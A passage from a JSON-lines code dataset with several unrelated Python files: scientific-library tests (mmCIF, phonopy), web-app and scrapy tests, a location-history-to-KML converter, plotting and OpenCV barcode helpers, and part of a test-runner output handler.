2, 'c': 3, 'd': 4})\n aCat.append({'a': 1, 'b': 2, 'c': 3, 'd': 4})\n aCat.extend(rowList)\n curContainer.append(aCat)\n aCat.renameAttributes({'a': 'aa', 'b': 'bb', 'c': 'cc', 'd': 'dd'})\n aCat.setName('renamedCategory')\n #\n #\n myContainerList = []\n myContainerList.append(curContainer)\n ofh = open(str(fn), \"w\")\n pdbxW = PdbxWriter(ofh)\n pdbxW.write(myContainerList)\n ofh.close()\n\n myContainerList = []\n ifh = open(str(fn), \"r\")\n pRd = PdbxReader(ifh)\n pRd.read(myContainerList)\n ifh.close()\n for container in myContainerList:\n for objName in container.getObjNameList():\n name, aList, rList = container.getObj(objName).get()\n print(\"Recovered data category %s\\n\" % name)\n print(\"Attribute list %r\\n\" % repr(aList))\n print(\"Row list %r\\n\" % repr(rList))\n assert len(myContainerList) == 1\n assert len(rList) == 2 * rLen + 2\n\n", "sub_path": "tests/pdbx_read_write_test.py", "file_name": "pdbx_read_write_test.py", "file_ext": "py", "file_size_in_byte": 12384, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pathlib2.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 34, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 35, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib2.Path", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 29, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 44, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 45, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 68, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 76, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 88, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 109, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 110, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 116, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 122, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 135, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 136, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 153, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 160, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 161, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 177, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 183, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 188, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 193, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 201, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 209, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 213, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategoryBase.DataCategoryBase", "line_number": 218, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 283, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 295, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 302, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 309, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 313, "usage_type": "call"}, {"api_name": "six.moves.range", "line_number": 321, "usage_type": "call"}, {"api_name": "mmcif.api.PdbxContainers.DataContainer", "line_number": 325, "usage_type": "call"}, {"api_name": "mmcif.api.DataCategory.DataCategory", "line_number": 326, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxWriter.PdbxWriter", "line_number": 338, "usage_type": "call"}, {"api_name": "mmcif.io.PdbxReader.PdbxReader", "line_number": 344, "usage_type": "call"}]} +{"seq_id": "150198022", "text": "import os\nimport threading\nimport time\n\nimport pytest\nimport requests\nfrom starlette.applications import Starlette\n\nfrom aws.app import create_app, run_server\n\n\nasync def test_create_app(mocker):\n mocker.patch(\"aws.app.init_logging\")\n mocker.patch(\"aws.app.logger\")\n api = mocker.patch(\"aws.app.api\")\n api.add_routes = lambda x: x\n\n app = create_app()\n assert isinstance(app, Starlette)\n\n\nasync def test_run():\n timeout = 1\n try_every = 0.1\n host = \"127.0.0.1\"\n port = 8001\n\n os.environ[\"HOST\"] = host\n os.environ[\"PORT\"] = str(port)\n os.environ[\"RELOAD\"] = \"0\"\n os.environ[\"DEBUG\"] = \"0\"\n\n thread = threading.Thread(target=run_server)\n thread.daemon = True\n thread.start()\n\n time_ = 0\n while time_ < timeout:\n try:\n resp = requests.get(f\"http://{host}:{port}/ping\")\n assert resp.status_code == 200\n break\n except requests.exceptions.ConnectionError:\n time_ = time_ + try_every\n time.sleep(try_every)\n\n\nasync def test_run__missing_variables():\n host = \"127.0.0.1\"\n port = 8001\n\n del os.environ[\"HOST\"]\n del os.environ[\"PORT\"]\n\n with pytest.raises(RuntimeError):\n run_server()\n\n os.environ[\"HOST\"] = host\n with pytest.raises(RuntimeError):\n run_server()\n del os.environ[\"HOST\"]\n\n os.environ[\"PORT\"] = str(port)\n with pytest.raises(RuntimeError):\n run_server()\n", "sub_path": "tests/unit_tests/test_app.py", "file_name": "test_app.py", "file_ext": "py", "file_size_in_byte": 1436, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "aws.app.create_app", "line_number": 18, "usage_type": "call"}, {"api_name": "starlette.applications.Starlette", "line_number": 19, "usage_type": "argument"}, {"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 31, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 33, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 33, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 43, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 55, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 56, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 59, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 60, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pytest.raises", "line_number": 64, "usage_type": "call"}, {"api_name": "aws.app.run_server", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "206281306", "text": "import unittest\nimport os\nimport numpy as np\nfrom phonopy import Phonopy\nfrom phonopy.interface.vasp import read_vasp\nfrom phonopy.file_IO import parse_FORCE_SETS, parse_BORN\nfrom phonopy.phonon.band_structure import get_band_qpoints\n\ndata_dir = os.path.dirname(os.path.abspath(__file__))\n\n\nclass TestBandStructure(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def _get_phonon(self):\n cell = read_vasp(os.path.join(data_dir, \"..\", \"POSCAR_NaCl\"))\n phonon = Phonopy(cell,\n np.diag([2, 2, 2]),\n primitive_matrix=[[0, 0.5, 0.5],\n [0.5, 0, 0.5],\n [0.5, 0.5, 0]])\n filename = os.path.join(data_dir, \"..\", \"FORCE_SETS_NaCl\")\n force_sets = parse_FORCE_SETS(filename=filename)\n phonon.set_displacement_dataset(force_sets)\n phonon.produce_force_constants()\n filename_born = os.path.join(data_dir, \"..\", \"BORN_NaCl\")\n nac_params = parse_BORN(phonon.get_primitive(), filename=filename_born)\n phonon.set_nac_params(nac_params)\n return phonon\n\n def test_band(self):\n self._test_band()\n\n def test_with_group_velocities(self):\n self._test_band(with_group_velocities=True)\n\n def test_is_band_connection(self):\n self._test_band(is_band_connection=True)\n\n def _test_band(self,\n with_group_velocities=False,\n is_band_connection=False):\n band_paths = [[[0, 0, 0], [0.5, 0.5, 0.5]],\n [[0.5, 0.5, 0], [0, 0, 0], [0.5, 0.25, 0.75]]]\n qpoints = get_band_qpoints(band_paths, npoints=11)\n phonon = self._get_phonon()\n phonon.run_band_structure(qpoints,\n with_group_velocities=with_group_velocities,\n is_band_connection=is_band_connection)\n band_structure = phonon.band_structure\n phonon.get_band_structure_dict()\n\n self.assertTrue(id(band_structure.distances),\n id(band_structure.get_distances()))\n self.assertTrue(id(band_structure.qpoints),\n id(band_structure.get_qpoints()))\n self.assertTrue(id(band_structure.frequencies),\n id(band_structure.get_frequencies()))\n self.assertTrue(id(band_structure.eigenvectors),\n id(band_structure.get_eigenvectors()))\n self.assertTrue(id(band_structure.group_velocities),\n id(band_structure.get_group_velocities()))\n\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(TestBandStructure)\n unittest.TextTestRunner(verbosity=2).run(suite)\n", "sub_path": "test/phonon/test_band_structure.py", "file_name": "test_band_structure.py", "file_ext": "py", "file_size_in_byte": 2785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 9, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 12, "usage_type": "attribute"}, {"api_name": "phonopy.interface.vasp.read_vasp", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "phonopy.Phonopy", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "phonopy.file_IO.parse_FORCE_SETS", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "phonopy.file_IO.parse_BORN", "line_number": 31, "usage_type": "call"}, {"api_name": "phonopy.phonon.band_structure.get_band_qpoints", "line_number": 49, "usage_type": "call"}, {"api_name": "unittest.TestLoader", "line_number": 70, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "255212103", "text": "\"\"\"\nConvert LocationHistory.json from Google takeout of location history (latitude)\nto a usable KML file for viewing in Google Earth.\n\n\nUsage: \n\n python json_history_to_kml.py LocationHistory.json\n\n\n\nExample kml output:\n \n \n \n Simple placemark\n Attached to the ground. Intelligently places itself \n at the height of the underlying terrain.\n \n -122.0822035425683,37.42228990140251,0\n \n \n \n\nExample JSON input:\n {\n \"locations\" : [ {\n \"timestampMs\" : \"1373570050813\",\n \"latitudeE7\" : 320946855,\n \"longitudeE7\" : 347981459,\n \"accuracy\" : 53\n },\n }\n\n\n\"\"\"\n\nimport sys\nimport json\nimport time\nimport os\n\nDAYS_DIR = 'kmldays'\n\nloc_fmt = \"\"\"\n \n {name}\n {description}\n \n {coordinates}\n \n \"\"\"\n\nkml_start = \"\"\"\n\n\"\"\"\n\nkml_end =\"\"\"\n\n\"\"\"\n\n\nclass KML:\n def __init__(self, fn):\n self.fn = fn\n self.fhand = open(self.fn, 'wb')\n self.fhand.write(kml_start)\n self.to_close = []\n \n def close(self):\n while len(self.to_close) > 0:\n self._close_one()\n self.fhand.write(kml_end)\n self.fhand.close()\n \n def _indent(self):\n return ' ' * len(self.to_close)\n \n def _node(self, node):\n spaces = self._indent()\n self._line('<%s>' % node)\n self.to_close.append('\\n%s' % (spaces, node))\n \n def _line(self, text):\n self.fhand.write('\\n%s%s' % (self._indent(), text))\n \n def Folder(self, name):\n self._node('Folder')\n self._line('%s' % name)\n self._line('0')\n \n def NetworkLink(self, name, fn):\n self._node('NetworkLink')\n self._line('%s' % name)\n self._line('0')\n self._line('%s' % fn)\n self._close_one()\n \n def PlaceMark(self, name, description, lat, lon):\n coord_str = \"%s,%s,0\" % (lon, lat)\n node = loc_fmt.format(name=name,\n description=description,\n coordinates=coord_str)\n self.fhand.write(node)\n \n def _close_one(self, expected=None):\n text = self.to_close.pop()\n if expected is not None:\n if not expected in text:\n raise Exception(\"Expected to close '%s' but found '%s'\" % (expected, text))\n self.fhand.write(text)\n \n\n\ndef main():\n fn = sys.argv[1]\n \n days_dir = os.path.join(os.path.dirname(fn), DAYS_DIR)\n \n if not os.path.exists(days_dir):\n os.mkdir(days_dir)\n \n out_fn = fn + '.kml'\n print('loading json')\n data = json.load(open(fn))\n locations = data['locations']\n cur_year = None\n cur_day = None\n day_kml = None\n print('handling %d points' % len(locations))\n \n kml = KML(out_fn)\n for i, loc in enumerate(locations):\n time_s = float(loc['timestampMs']) / 1e3\n lat = float(loc['latitudeE7']) / 1e7\n lon = float(loc['longitudeE7']) / 1e7\n coord_str = \"%s,%s,0\" % (lon, lat)\n acc = loc.get('accuracy', 'n/a')\n tm = time.gmtime(time_s)\n date_str = time.strftime(\"%Y-%m-%d\", tm)\n time_str = time.strftime(\"%Y-%m-%d %a %H:%M:%S\", tm)\n desc_str = 'accuracy %s meters' % acc\n\n if i % 1000 == 0:\n sys.stdout.write('.')\n\n if date_str != cur_day:\n if i != 0:\n #break\n #kml._close_one('Folder') # previous day\n day_kml.close()\n\n if tm.tm_year != cur_year:\n if i != 0:\n kml._close_one('Folder') # previous year\n\n cur_year = tm.tm_year\n kml.Folder(name=str(cur_year))\n\n cur_day = date_str\n #kml.Folder(name=str(date_str))\n day_fn = os.path.join(days_dir, date_str + '.kml')\n day_kml = KML(day_fn)\n kml.NetworkLink(name=date_str, fn=day_fn)\n\n\n #fhand.write(node)\n name = time_str\n description = desc_str\n coordinates = coord_str\n day_kml.PlaceMark(name, description, lon=lon, lat=lat)\n\n kml.close()\n \n \n\nif __name__ == \"__main__\":\n main()\n\n\n", "sub_path": "all-gists/6204256/snippet.py", "file_name": "snippet.py", "file_ext": "py", "file_size_in_byte": 4711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.argv", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 121, "usage_type": "call"}, {"api_name": "json.load", "line_number": 125, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 139, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 140, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 141, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 145, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}]} +{"seq_id": "326372409", "text": "import unittest\n\nimport scrapy\nimport other_validators\nfrom scrapy.crawler import CrawlerProcess\n\ntest_configs = [\n {\n \"allowed_domains\": [\"www.nyu.edu\"],\n \"start_urls\": [\"http://www.nyu.edu/students/getting-started-at-nyu/getting-started-at-nyu2017/real-talk.html\"],\n \"expect\": 8\n },\n {\n \"allowed_domains\": [\"www.foxmovies.com\"],\n \"start_urls\": [\"http://www.foxmovies.com\"],\n \"expect\": 8\n },\n ##### This is an edge case where videom\n # {\n # \"allowed_domains\":[\"www.deloitte.com\"],\n # \"start_urls\": [\"https://www2.deloitte.com/us/en/pages/deloitte-analytics/topics/deloitte-analytics-services.html?icid=top_deloitte-analytics-services\"],\n # \"expect\": 1\n # }\n]\n\n\nclass TestSpider(scrapy.Spider):\n name = \"testspider\"\n allowed_domains = []\n start_urls = []\n expect_result = None\n parent = None\n\n def start_requests(self):\n yield scrapy.Request(self.start_urls[0], self.parse)\n\n def parse(self, response):\n # import pdb; pdb.set_trace();\n yt_player_count = other_validators.valid_youtube_players(response)\n # self.assertEqual(yt_player_count, self.expect_result)\n print(\" YouTube player found on link: \" + response.url + \" \", '*')\n if self.parent:\n self.parent.check_spider_output(self.expect_result, yt_player_count)\n\n\nclass SpidersTestRunner(unittest.TestCase):\n def test_run(self):\n process = CrawlerProcess()\n\n for spider in test_configs:\n process.crawl(TestSpider, allowed_domains=spider[\"allowed_domains\"], start_urls=spider[\"start_urls\"],\n expect=spider[\"expect\"], parent=self)\n\n\n def check_spider_output(self, expect, result):\n self.assertEqual(expect, result)\n\n\n# if __name__ == '__main__':\n# unittest.main()\nsuite = unittest.TestLoader().loadTestsFromTestCase(SpidersTestRunner)\nunittest.TextTestRunner(verbosity=2).run(suite)\n", "sub_path": "crawler/modules/video_player_validators/test_other_validators.py", "file_name": "test_other_validators.py", "file_ext": "py", "file_size_in_byte": 1962, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "scrapy.Spider", "line_number": 27, "usage_type": "attribute"}, {"api_name": "scrapy.Request", "line_number": 35, "usage_type": "call"}, {"api_name": "other_validators.valid_youtube_players", "line_number": 39, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 46, "usage_type": "attribute"}, {"api_name": "scrapy.crawler.CrawlerProcess", "line_number": 48, "usage_type": "call"}, {"api_name": "unittest.TestLoader", "line_number": 61, "usage_type": "call"}, {"api_name": "unittest.TextTestRunner", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "177941892", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import defaultdict\n\nplt_colors = ['c', 'r', 'g', 'b', 'y', 'k', 'm', '#2A0134', '#FF00FF', '#800000']\nplt_markers = ['*', '.', 'o', '^', 'v', '<', '>', '1', '2', '3', '4', 's', 'p', ',']\nfont = {\n 'size': 18\n}\n\nsrc_domain, tgt_domain = 'usa', 'sng'\nplt_title = ''\nsub_dir = 'contrast_usa_v1'\nlog_file = f'../checkpoints/fusion_consis/xmuda/{sub_dir}/log.log' # to add: tgt_val, src_val\n\n\naccf = open(log_file, 'r')\nlines = accf.readlines()\naccf.close()\nlosses = defaultdict(list)\nfor line in lines:\n if 'Epoch' in line:\n splits = line.split(', ')\n for token in splits:\n for loss_type in ['contrast_loss', 'seg_loss', 'tgt_contrast_loss']:\n if token.startswith(loss_type):\n losses[loss_type].append(float(token.split(': ')[1]))\nif 'contrast_loss' in losses.keys():\n losses['src_contrast_loss'] = losses['contrast_loss']\n del losses['contrast_loss']\nx_len = len(losses['seg_loss'])\nx_range = np.arange(x_len) + 1\n\n\nif __name__ == '__main__':\n plt.title(plt_title, font)\n # plt.xlabel('log_interval(every 25 batches)', font)\n plt.xlabel('epoch', font)\n plt.ylabel('loss', font)\n for i, (key, val) in enumerate(losses.items()):\n val = np.array(val)\n plt.plot(x_range, val, label=key, color=plt_colors[i], linewidth=1.)\n plt.xticks(range(0, x_len, x_len // 24), labels=range(0, 25))\n plt.legend(loc='best', prop=font)\n plt.ylim(bottom=0)\n plt.show()\n", "sub_path": "scripts/old/old_loss_curve.py", "file_name": "old_loss_curve.py", "file_ext": "py", "file_size_in_byte": 1526, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "collections.defaultdict", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "206606779", "text": "import cv2\nimport pyzbar.pyzbar as pyzbar\nimport numpy as np\n\n\n# 폰트 정보\nFONT_THICK = 2\nFONT_SIZE = 1\nFONT_COLOR = (200, 0, 200)\n\n\n# contours 그리기 위한 이미지 보정\ndef edit_for_contours(img):\n img_blur = cv2.GaussianBlur(img, (13, 13), 1)\n img_gray = cv2.cvtColor(img_blur, cv2.COLOR_BGR2GRAY)\n img_canny = cv2.Canny(img_gray, 50, 90)\n kernel = np.ones((5, 5))\n img_dil = cv2.dilate(img_canny, kernel, iterations=1)\n return img_dil\n\n\n# 바코드 번호 알아내기 위한 이미지 보정\ndef edit_for_barcode(img, cnt):\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n x1, y1 = np.min(cnt, axis=0)\n x2, y2 = np.max(cnt, axis=0)\n img_cut = img_gray[y1:y2, x1:x2]\n return img_cut\n\n\n# img 에서 contour 구한 뒤 img_contour 에 contour 그리기\ndef draw_contours(img_contour, img, area_min):\n # img 에서 contour 찾기\n contours, _ = cv2.findContours(img_contour, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n # contour box 좌표 정보\n result = []\n\n for cnt in contours:\n # contour 영역 구하기\n area = cv2.contourArea(cnt)\n\n # 최소 영역 이상일 때만 반복문 실행\n if area < area_min:\n continue\n\n # contour box 좌표 구하기\n rect = cv2.minAreaRect(cnt)\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n\n # contour box 그리기\n cv2.drawContours(img, [box], -1, (0, 0, 255), 2)\n\n # contour box 좌표 정보 추가\n result.append(box)\n\n # contour box 좌표 정보 반환\n return result\n\n\n# img_contour 에 x, y, z 정보 표시\ndef draw_xyz(img, xyz):\n cv2.putText(img, \"X: \"+str(xyz[0])+\"cm\", (5, 30), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n cv2.putText(img, \"Y: \"+str(xyz[1])+\"cm\", (5, 60), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n cv2.putText(img, \"Z: \"+str(xyz[2])+\"cm\", (5, 90), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n\n\n# img 에서 비코드 번호 구한 뒤 img_contour 에 바코드 정보 표시\ndef draw_barcode(img_barcode, img):\n barcodes = pyzbar.decode(img_barcode)\n\n cnt = 2\n # 결과 출력(탐지된 코드 타입, 데이터)\n for obj in barcodes:\n cv2.putText(img, \"Type : \"+obj.type, (5, (60*cnt)), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n cv2.putText(img, \"Data : \"+obj.data.decode('utf-8'), (5, (60*cnt)+30), cv2.FONT_HERSHEY_COMPLEX, FONT_SIZE, FONT_COLOR, FONT_THICK)\n print('Type : ', obj.type)\n print('Data : ', obj.data.decode('utf-8'))\n cnt += 1\n", "sub_path": "OpenCV_webcam/graphic.py", "file_name": "graphic.py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.GaussianBlur", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.dilate", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.min", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_NONE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.minAreaRect", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 53, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pyzbar.pyzbar.decode", "line_number": 71, "usage_type": "call"}, {"api_name": "pyzbar.pyzbar", "line_number": 71, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 76, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 77, "usage_type": "attribute"}]} +{"seq_id": "432843158", "text": "# (C) Steve Stagg\n\n\"\"\"\nColorful output showing multiprocess activity and status\n\"\"\"\n\nimport os\nimport itertools\nimport struct\nimport fcntl\nimport termios\nimport time\n\nimport subtest.color\nimport subtest.result\nimport subtest.handlers.path\n\n\nC = subtest.color.C\n\n\ndef ioctl_GWINSZ(fd):\n \"\"\"Ask the terminal directly what the window size is, Taken from\n http://stackoverflow.com/questions/566746/\n how-to-get-console-window-width-in-python\"\"\"\n try:\n cr = struct.unpack(\n 'hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))\n except:\n return None\n return cr\n\n\ndef terminal_size():\n cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)\n if not cr:\n try:\n fd = os.open(os.ctermid(), os.O_RDONLY)\n cr = ioctl_GWINSZ(fd)\n os.close(fd)\n except:\n pass\n if not cr:\n try:\n cr = (os.environ['LINES'], os.environ['COLUMNS'])\n except:\n cr = (25, 80)\n return int(cr[1]), int(cr[0])\n\n\nclass Handler(subtest.result.ResultHandler):\n\n DESCRIPTIONS = {\n \"success\": (\"OK\", \"OK\", \"OK\", C.green),\n \"fail\": (\"F\", \"Failure\", \"Failures\", C.red),\n \"error\": (\"E\", \"Error\", \"Errors\", C.red),\n \"expectedfail\": (\"x\", \"Expected Failure\",\n \"Expected Failures\", C.yellow),\n \"skip\": (\"s\", \"Skip\", \"Skipped\", C.blue),\n \"unhandled\": (\"u\", \"Unhandled\", \"Unhandled\", C.red),\n }\n TYPES = {\n subtest.handlers.path.PathTest: C.blue(\"D\"), # D for discovery\n subtest.handlers.unit.UnittestTest: C.green(\"t\"),\n }\n\n def __init__(self, *args, **kwargs):\n super(Handler, self).__init__(*args, **kwargs)\n self.first_output = None\n self.last_output = None\n self.total = 0\n self.counts = dict((name, 0) for name in self.DESCRIPTIONS.keys())\n self.running = []\n self.max_running = 0\n\n def ignore_result(self, test, result=None):\n return isinstance(test, subtest.handlers.path.PathTest)\n\n def _runners(self):\n parts = []\n self.max_running = max(len(self.running), self.max_running)\n for run in self.running:\n char = self.TYPES.get(run, C.yellow(\"?\"))\n parts.append(char)\n for i in range(self.max_running - len(parts)):\n parts.append(\" \")\n return \"[%s]\" % (\"\".join(parts)), 2 + len(parts)\n\n def _ansii_encode(self, code):\n return \"\\x1b[%s\" % 